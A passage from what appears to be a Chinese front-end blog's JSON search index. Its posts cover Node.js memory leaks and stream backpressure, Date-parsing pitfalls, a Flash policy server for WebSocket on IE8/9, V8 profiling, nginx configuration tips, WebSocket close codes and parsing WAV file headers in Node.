https://nodejs.org/dist/latest-v12.x/docs/api/v8.html#v8_v8_writeheapsnapshot_filename https://github.com/socketio/socket.io/issues/3494 ","permalink":"https://wdd.js.org/fe/memory-leak-sharing/","summary":"什么是内存泄漏? 单位时间内的内存变化量可能有三个值\n正数:内存可能存在泄漏。生产环境,如果服务在启动后,该值一直是正值,从未出现负值或者趋近于0的值,那么极大的可能是存在内存泄漏的。 趋近于0的值: 内存稳定维持 负数:内存在释放 实际上,在观察内存变化量时,需要有两个前提条件\n一定的负载压力:因为在开发或者功能测试环境,很少的用户,服务的压力很小,是很难观测到内存泄漏问题的。所以务必在一定的负载压力下观测。 至少要观测一天:内存上涨并不一定意味着存在内存泄漏问题。在一个工作日中,某些时间点,是用户使用的高峰期,服务的负载很高,自然内存使用会增长。关键在于在高峰期过后的低谷期时,内存是否回下降到正常值。如果内存在低谷期时依然维持着高峰期时的内存使用,那么非常大可能是存在内存泄漏了。 下图是两个服务的。从第一天的0点开始观测服务的内存,一直到第二天的12点。正常的服务会随着负载的压力增加或者减少内存使用。而存在内存泄漏的服务,内存一直在上升,并且负载压力越大,上升的越快。\n有没有可能避免内存泄漏? 除非你不写代码,否者你是无法避免内存泄漏的问题的。\n第一,即使你是非常精通某个语言,也是有很多关于如何避免内存泄漏的经验。但是你的代码里仍然可能会包含其他库或者其他同事写的代码,那些代码里是无法保证是否存在内存泄漏问题的。 第二,内存泄漏的代码有时候非常难以察觉。例如console.log打印的太快,占用太多的buffer。网络流量激增,占用太多的Recv_Q,node无法及时处理。写文件太慢,没有处理“后压”相关的逻辑等等。\n为什么要关注内存泄漏? 为什么要关注内存泄漏?我们客户的服务器可是有500G内存的\n你可能有个很豪的金主。但是你不要忘记一个故事。\n传说国际象棋是由一位印度数学家发明的。国王十分感谢这位数学家,于是就请他自己说出想要得到什么奖赏。这位数学家想了一分钟后就提出请求——把1粒米放在棋盘的第1格里,2粒米放在第2格,4粒米放在第3格,8粒米放在第4格,依次类推,每个方格中的米粒数量都是之前方格中的米粒数量的2倍。\n国王欣然应允,诧异于数学家竟然只想要这么一点的赏赐——但随后却大吃了一惊。当他开始叫人把米放在棋盘上时,最初几个方格中的米粒少得像几乎不存在一样。但是,往第16个方格上放米粒时,就需要拿出1公斤的大米。而到了第20格时,他的那些仆人则需要推来满满一手推车的米。国王根本无法提供足够的大米放在棋盘上的第64格上去。因为此时,棋盘上米粒的数量会达到惊人的18 446 744 073 709 551 615粒。如果我们在伦敦市中心再现这一游戏,那么第64格中的米堆将延伸至M25环城公路,其高度将超过所有建筑的高度。事实上,这一堆米粒比过去1000年来全球大米的生产总量还要多得多。\n对于内存泄漏来说,可能500G都是不够用的。\n实际上操作系统对进程使用内存资源是有限制的,我们关注内存泄漏,实际上是关注内存泄漏会引起的最终问题:out of memory。如果进程使用的资源数引起了操作系统的注意,很可能进程被操作系统杀死。\n然后你的客户可能正在使用你的服务完成一个重要的事情,接着你们的客户投诉热线回被打爆,然后是你的老板,你的领导找你谈话~~~\n基本类型 vs 引用类型 基本类型:undefined, null, boolean, number, string。基本类型是按值访问 引用类型的值实际上是指向内存中的对象 上面的说法来自《JavaScript高级程序设计》。但是对于基本类型字符串的定义,实际上我是有些不认同的。有些人也认为字符串不属于基本类型。\n就是关于字符串,我曾思考过,在JavaScript里,字符串的最大长度是多少,字符串最多能装下多少个字符?\n我个人认为,一个变量有固定的大小的内存占用,才是基本类型。例如数字,null, 布尔值,这些值很容易能理解他们会占用固定的内存大小。但是字符串就不一样了。字符串的长度是不固定,在不同的浏览器中,有些字符串最大可能占用256M的内存,甚至更多。\n可以参考这个问题:https://stackoverflow.com/questions/34957890/javascript-string-size-limit-256-mb-for-me-is-it-the-same-for-all-browsers\n内存是一张图 1代表根节点,在NodeJS里是global对象,在浏览器中是window对象 2-6代表对象 7-8代表原始类型。分别有三种,字符串,数字,布尔值 9-10代表从根节点无法到达的对象 注意,作为原始类型的值,在内存图中只能是叶子节点。 ** 从跟节点R0无法到达的节点9,10,将会在GC时被清除。\n保留路径的含义是从跟对象到某一节点的最短路径。例如1-\u0026gt;2-\u0026gt;4-\u0026gt;6。\n对象保留树 节点: 构造函数的名称 边缘:对象的key 距离: 节点到跟节点的最短距离 支配项(Dominators) 每个对象有且仅有一个支配项 如果B存在从根节点到A节点之间的所有路径中,那么B是A的支配项,即B支配A。 下图中\n1支配2 2支配3,4,6 (想想2为什么没有支配5?) 3支配5 6支配7 5支配8 理解支配项的意义在于理解如何将资源释放。如下图所示,如果目标是释放节点6的占用资源,仅仅释放节点3或者节点4是没有用的,必需释放其支配项节点2,才能将节点6释放。 对象大小 对象自身占用大小:shadow size 通过保持对其他对象的引用隐式占用,这种方式可以阻止这些对象被垃圾回收器(简称 GC)自动处置 对象的大小的单位是字节 分析工具 heapsnapshot import {writeHeapSnapshot} from \u0026#39;v8\u0026#39; router.","title":"JS内存泄漏分享"},{"content":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也度过几遍,但是不太了解,这次接合实际情况。有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","permalink":"https://wdd.js.org/fe/oom-backpressuring-in-streams/","summary":"今天我收集了一份大概有40万行的日志,为了充分利用这份日志,我决定把日志给解析,解析完了之后,再写入mysql数据库。\n首先,对于40万行的日志,肯定不能一次性读取到内存。\n所以我用了NodeJs内置的readline模块。\nconst readline = require(\u0026#39;readline\u0026#39;) let line_no = 0 let rl = readline.createInterface({ input: fs.createReadStream(\u0026#39;./my.log\u0026#39;) }) rl.on(\u0026#39;line\u0026#39;, function(line) { line_no++; console.log(line) }) // end rl.on(\u0026#39;close\u0026#39;, function(line) { console.log(\u0026#39;Total lines : \u0026#39; + line_no); }) 数据解析以及写入到这块我没有贴代码。代码的执行是正常的,但是一段时间之后,程序就报错Out Of Memory。\n代码执行是在nodejs 10.16.3上运行的,谷歌搜了一下解决方案,看到有人说nodejs升级到12.x版本就可以解决这个问题。我抱着试试看的想法,升级了nodejs到最新版,果然没有再出现OOM的问题。\n后来我想,我终于深刻理解了NodeJS官网上的这篇文章 Backpressuring in Streams,以前我也度过几遍,但是不太了解,这次接合实际情况。有了深刻理解。\nNodeJS在按行读取本地文件时,大概可以达到每秒1000行的速度,然而数据写入到MySql,大概每秒100次插入的样子。\n本身网络上存在的延迟就要比读取本地磁盘要慢,读到太多的数据无法处理,只能暂时积压到内存中,然而内存有限,最终OOM的异常就抛出了。\nNodeJS 12.x应该解决了这个问题。\n参考 https://nodejs.org/en/docs/guides/backpressuring-in-streams/ ","title":"NodeJS Out of Memory: Backpressuring in Streams"},{"content":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持的你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比价靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!\n","permalink":"https://wdd.js.org/fe/trap-of-new-date/","summary":"一般情况下,建议你不要用new Date(\u0026ldquo;time string\u0026rdquo;)的方式去做时间解析。因为不同浏览器,可能接受的time string的格式都不一样。\n你最好不要去先入为主,认为浏览器会支持的你的格式。\n常见的格式 2010-10-10 19:00:00 就这种格式,在IE11上是不接受的。\n下面的比较,在IE11上返回false, 在chrome上返回true。原因就在于,IE11不支持这种格式。\nnew Date() \u0026gt; new Date(\u0026#39;2010-10-10 19:00:00\u0026#39;) 所以在时间处理上,最好选用比价靠谱的第三方库,例如dayjs, moment等等。\n千万不要先入为主!!","title":"new Date('time string')的陷阱"},{"content":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocet服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.on(\u0026#39;connection\u0026#39;, function(socket) { console.log(\u0026#39;A new connection has been established.\u0026#39;); socket.end(policyFile) socket.on(\u0026#39;data\u0026#39;, function(chunk) { console.log(`Data received from client: ${chunk.toString()}`); }); socket.on(\u0026#39;end\u0026#39;, function() { console.log(\u0026#39;Closing connection with the client\u0026#39;); }); socket.on(\u0026#39;error\u0026#39;, function(err) { console.log(`Error: ${err}`); }); }); ","permalink":"https://wdd.js.org/fe/ie89-websocket-flash/","summary":"IE8/9原生是不支持WebSocket的,但是我们可以使用flash去模拟一个WebSocket接口出来。\n这方面,https://github.com/gimite/web-socket-js 已经可以使用。\n除了客户端之外,服务端需要做个flash安全策略设置。\n这里的服务端是指WebSocet服务器所在的服务端。默认端口是843端口。\n客户端使用flash模拟WebSocket时,会打开一个到服务端843端口的TCP链接。\n并且发送数据:\n\u0026lt;policy-file-request\u0026gt;. 服务端需要回应下面类似的内容\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt; Node.js实现 policy.js module.exports.policyFile = `\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE cross-domain-policy SYSTEM \u0026#34;/xml/dtds/cross-domain-policy.dtd\u0026#34;\u0026gt; \u0026lt;cross-domain-policy\u0026gt; \u0026lt;site-control permitted-cross-domain-policies=\u0026#34;all\u0026#34;/\u0026gt; \u0026lt;allow-access-from domain=\u0026#34;*\u0026#34; to-ports=\u0026#34;*\u0026#34; secure=\u0026#34;false\u0026#34;/\u0026gt; \u0026lt;allow-http-request-headers-from domain=\u0026#34;*\u0026#34; headers=\u0026#34;*\u0026#34;/\u0026gt; \u0026lt;/cross-domain-policy\u0026gt;` index.js const Net = require(\u0026#39;net\u0026#39;) const {policyFile} = require(\u0026#39;./policy\u0026#39;) const port = 843 console.log(policyFile) const server = new Net.Server() server.listen(port, function() { console.log(`Server listening for connection requests on socket localhost:${port}`); }); server.","title":"IE8/9 支持WebSocket方案,flash安全策略"},{"content":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。\n","permalink":"https://wdd.js.org/fe/vscode-high-cpu/","summary":"电脑的风扇声突然响了起来,我知道有某个进程在占用大量CPU资源。\n在任务管理器中,可以看到vscode占用的的CPU资源达到150。说明问题出在vscode上。\n在vscode中,按F1, 输入: show running extensions 可以查看所有插件的运行状况。\n其中需要关注最重要的指标就是活动时间:如果某个插件的活动时间明显是其他插件的好多倍,那问题就可能出在这个插件上。要么禁用该插件,要么卸载该插件。","title":"为什么vscode会占用大量CPU资源?"},{"content":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","permalink":"https://wdd.js.org/fe/bin-number-operator/","summary":"js原生支持16进制、10进制、8进制的直接定义\nvar a = 21 // 十进制 var b = 0xee // 十六进制, 238 var c = 013 // 八进制 11 十进制转二进制字符串 var a = 21 // 十进制 a.toString(2) // \u0026#34;10101\u0026#34; 二进制转10进制 var d = \u0026#34;10101\u0026#34; parseInt(\u0026#39;10101\u0026#39;,2) // 21 ","title":"js中二进制的操作"},{"content":"const fs = require(\u0026#39;fs\u0026#39;) var request = require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","permalink":"https://wdd.js.org/fe/nodejs-stream-unzip/","summary":"const fs = require(\u0026#39;fs\u0026#39;) var request = require(\u0026#39;request\u0026#39;) const zlib = require(\u0026#39;zlib\u0026#39;) const log = require(\u0026#39;./log.js\u0026#39;) const fileType = \u0026#39;\u0026#39; let endCount = 0 module.exports = (item) =\u0026gt; { return new Promise((resolve, reject) =\u0026gt; { request.get(item.url) .on(\u0026#39;error\u0026#39;, (error) =\u0026gt; { log.error(`下载失败${item.name}`) reject(error) }) .pipe(zlib.createGunzip()) .pipe(fs.createWriteStream(item.name + fileType)) .on(\u0026#39;finish\u0026#39;, (res) =\u0026gt; { log.info(`${++endCount} 完成下载 ${item.name + fileType}`) resolve(res) }) }) } ","title":"NodeJS边下载边解压gz文件"},{"content":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n\u0026ndash;log-source-code 不是必传的字段,加了该字段可以在定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。\n","permalink":"https://wdd.js.org/fe/v8-profile/","summary":"下面的命令可以生成一个v8的日志如 isolate-0x102d4e000-86008-v8.log\n\u0026ndash;log-source-code 不是必传的字段,加了该字段可以在定位到源码 node --prof --log-source-code index.js 下一步是将log文件转成json\nnode --prof-process --preprocess isolate-0x102d4e000-86008-v8.log \u0026gt; v8.json 然后打开 https://wangduanduan.gitee.io/v8-profiling/ 这个页面,选择v8.json\n下图横坐标是时间,纵坐标是cpu百分比。\n选择Bottom Up之后,展开JS unoptimized, 可以发现占用cpu比较高的代码的位置。","title":"V8 Profile"},{"content":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5. 如何给某个路径的请求设置独立的日志文件? location ^~ /p/asm { access_log /var/log/nginx/a.log; error_log /var/log/nginx/a.err.log; } 6. 如何设置nginx的静态文件服务器 location / { add_header Cache-Control max-age=360000; root /usr/share/nginx/html/webrtc-sdk/dist/; } # 如果目标地址中没有video, video只是用来识别路径的,则需要使用 # rewrite指令去去除video路径 # 否则访问/video 就会转到 /home/resources/video 路径 location /video { rewrite /video/(.*) /$1 break; add_header Cache-Control max-age=360000; autoindex on; root /home/resources/; } 7. 反向代理时,如何做路径重写? 使用 rewrite 指令,例如 rewrite /p/(.*) /$1 break; 8. Nginx如何配置才能做websocket代理? location ^~ /websocket { proxy_pass http://192.168.40.174:31089; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection \u0026#34;Upgrade\u0026#34;; } 9. 如何调整nginx的最大打开文件限制 设置worker_rlimit_nofile\nuser root root; worker_processes 4; worker_rlimit_nofile 65535; 10. 如何判断worker_rlimit_nofile是否生效? 11. 直接返回文本 location / { default_type text/plain; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type text/html; return 502 \u0026#34;服务正在升级,请稍后再试……\u0026#34;; } location / { default_type application/json; return 502 \u0026#39;{\u0026#34;status\u0026#34;:502,\u0026#34;msg\u0026#34;:\u0026#34;服务正在升级,请稍后再试……\u0026#34;}\u0026#39;; } 13. 多种日志格式 例如,不通的反向代理,使用不同的日志格式。\n例如下面,定义了三种日志格式main, mian1, main2。\n在access_log 指令的路径之后,指定日志格式就可以了。\nhttp { log_format main \u0026#39;$time_iso8601 $remote_addr $status $request\u0026#39;; log_format main2 \u0026#39;$remote_addr $status $request\u0026#39;; log_format main3 \u0026#39;$status $request\u0026#39;; access_log /var/log/nginx/access.log main; 14. 权限问题 例如某些端口无法监听,则需要检查是否被selinux给拦截了。 或者nginx的启动用户不是root用户导致无法访问某些root用户的目录。\n参考 https://mp.weixin.qq.com/s/JUOyAe1oEs-WwmEmsHRn8w https://www.nginx.com/blog/tcp-load-balancing-udp-load-balancing-nginx-tips-tricks/ https://www.cnblogs.com/freeweb/p/5944894.html ","permalink":"https://wdd.js.org/fe/nginx-tips/","summary":"1. 启动?停止?reload配置 nginx -s reload # 热重启 nginx -s reopen # 重启Nginx nginx -s stop # 快速关闭 nginx -s quit # 等待工作进程处理完成后关闭 nginx -T # 查看配置文件的实际内容 2. nginx如何做反向http代理 location ^~ /api { proxy_pass http://192.168.40.174:32020; } 3. nginx要如何配置才能处理跨域问题 location ^~ /p/asm { proxy_pass http://192.168.40.174:32020; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Methods\u0026#39; \u0026#39;GET,POST,PUT,DELETE,PATCH,OPTIONS\u0026#39;; add_header \u0026#39;Access-Control-Allow-Headers\u0026#39; \u0026#39;Content-Type,ssid\u0026#39;; if ($request_method = \u0026#39;OPTIONS\u0026#39;) {return 204;} proxy_redirect off; proxy_set_header Host $host; } 4. 如何拦截某个请求,直接返回某个状态码? location ^~ /p/asm { return 204 \u0026#34;OK\u0026#34;; } 5.","title":"前端必会的nginx知识点"},{"content":"WebSocket断开码,一般是用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必需传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009)aFailed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","permalink":"https://wdd.js.org/fe/websocket-disconnect-test/","summary":"WebSocket断开码,一般是用到的是从1000-1015。\n正常的断开码是1000。其他的都是异常断开。\n场景 服务端断开码 备注 刷新浏览器页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器tab页面 1001 终端离开, 可能因为服务端错误, 也可能因为浏览器正从打开连接的页面跳转离开. 关闭浏览器, 所有标签页都会关闭。 1001 可以发现。无论是刷新,关闭tab页面还是关闭浏览器,错误码都是1001 ws.close() 1005 主动调用close, 不传递错误码。对服务端来说,也是异常断开。1005表示没有收到预期的状态码. ws.close(1000) 1000 正常的关闭,客户端必需传递正确的错误原因码。原因码不是随便填入的。比如 ws.close(1009)aFailed to execute \u0026lsquo;close\u0026rsquo; on \u0026lsquo;WebSocket\u0026rsquo;: The code must be either 1000, or between 3000 and 4999. 1009 is neither. 客户端断网 ","title":"WebSocket断开码测试"},{"content":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读区。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 ... 4727674 more bytes\u0026gt; step2: 工具函数 // 将buf转为字符串 function buffer2String (buf) { let int = [] for (let i=0; i\u0026lt;buf.length; i++) { int.push(buf.readUInt8(i)) } return String.fromCharCode(...int) } // 对读区的头字段的值进行校验 // 实际上头字段之间是存在一定的关系的 function validWav (wav, fileSize) { //20 2 AudioFormat PCM = 1 (i.e. Linear quantization) // Values other than 1 indicate some // form of compression. // 22 2 NumChannels Mono = 1, Stereo = 2, etc. // 24 4 SampleRate 8000, 44100, etc. // 28 4 ByteRate == SampleRate * NumChannels * BitsPerSample/8 // 32 2 BlockAlign == NumChannels * BitsPerSample/8 // The number of bytes for one sample including // all channels. I wonder what happens when // this number isn\u0026#39;t an integer? // 34 2 BitsPerSample 8 bits = 8, 16 bits = 16, etc. if (wav.AudioFormat !== 1) { return 1 } if (![1,2].includes(wav.NumChannels)){ return 2 } if (![8000,44100].includes(wav.SampleRate)){ return 3 } if (![8,16].includes(wav.BitsPerSample)){ return 4 } if (wav.ByteRate !== wav.SampleRate * wav.NumChannels * wav.BitsPerSample / 8){ return 5 } if (wav.BlockAlign !== wav.NumChannels * wav.BitsPerSample / 8 ){ return 6 } if (wav.ChunkSize + 8 !== fileSize) { return 7 } return 0 } class ByteWalk { constructor(buf){ // 记录当前读过的字节数 this.current = 0 // 记录整个buf this.buf = buf } // 用来指定要读取的字节数,以及它的格式 step(s, f){ if (this.current === this.buf.length) { return } let bf if (arguments.length === 0) { s = this.buf.length - this.current } if (this.current + s \u0026gt;= this.buf.length) { bf = this.buf.slice(this.current, this.buf.length) this.current = this.buf.length } else { bf = this.buf.slice(this.current, this.current + s) this.current += s } // 一个特殊的标记,用来标记按照字符串的方式读取buf if (f === \u0026#39;readStringBE\u0026#39;) { return buffer2String(bf) } if (!f) { return bf } return bf[f](); } } function readData (buf, step, read) { let data = [] for (let i=0; i\u0026lt;buf.length; i += step) { data.push(buf[read](i)) } return data } module.exports = { buffer2String, // validFile, ByteWalk, validWav, readData } step3: main函数 const fs = require(\u0026#39;fs\u0026#39;) const path = require(\u0026#39;path\u0026#39;) const { ByteWalk, validWav, readData } = require(\u0026#39;./util\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) const B = new ByteWalk(file) // 按照固定的字节数读取 let friendData = { ChunkID: B.step(4,\u0026#39;readStringBE\u0026#39;), ChunkSize: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Format: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk1Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), AudioFormat: B.step(2, \u0026#39;readUInt16LE\u0026#39;), NumChannels: B.step(2, \u0026#39;readUInt16LE\u0026#39;), SampleRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), ByteRate: B.step(4, \u0026#39;readUInt32LE\u0026#39;), BlockAlign: B.step(2, \u0026#39;readUInt16LE\u0026#39;), BitsPerSample: B.step(2, \u0026#39;readUInt16LE\u0026#39;), Subchunk2ID: B.step(4, \u0026#39;readStringBE\u0026#39;), Subchunk2Size: B.step(4, \u0026#39;readUInt32LE\u0026#39;), Data: B.step() } // var data = readData(friendData.Data, friendData.BlockAlign, \u0026#39;readInt16LE\u0026#39;) console.log(validWav(friendData, file.length)) console.log(friendData, friendData.Data.length) // console.log(data) 从输出的内容可以看到,个个头字段基本上都读取出来了。\n0 { ChunkID: \u0026#39;RIFF\u0026#39;, ChunkSize: 4727716, Format: \u0026#39;WAVE\u0026#39;, Subchunk1ID: \u0026#39;fmt \u0026#39;, Subchunk1Size: 16, AudioFormat: 1, NumChannels: 2, SampleRate: 8000, ByteRate: 32000, BlockAlign: 4, BitsPerSample: 16, Subchunk2ID: \u0026#39;data\u0026#39;, Subchunk2Size: 4727680, Data: \u0026lt;Buffer 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... 4727630 more bytes\u0026gt; } 4727680 想要深入理解wav文件格式的,可以看下最后的参考资料。\n之后大家可以从做一些有趣的事情,例如双声道的声音做声道分离,或者说双声道合并成单声道等等。\n参考资料 http://soundfile.sapp.org/doc/WaveFormat/ ","permalink":"https://wdd.js.org/fe/nodejs-read-wav-file/","summary":"相比于普通的文件,二进制的文件略显神秘。本次就为大家揭开二进制文件的面纱。\nWAV文件的格式 下图是一个普通的wav文件的格式。其中除了最后的data部分,其他的每个格子都占用了固定大小的字节数。\n知道字节数之后,就需要按照正确的字节序读区。字节序读反了,可能读出一堆乱码。 关于字节序,可以参考阮一峰老师写的理解字节序这篇文章。\nstep1: 读取文件 const fs = require(\u0026#39;fs\u0026#39;) const path = 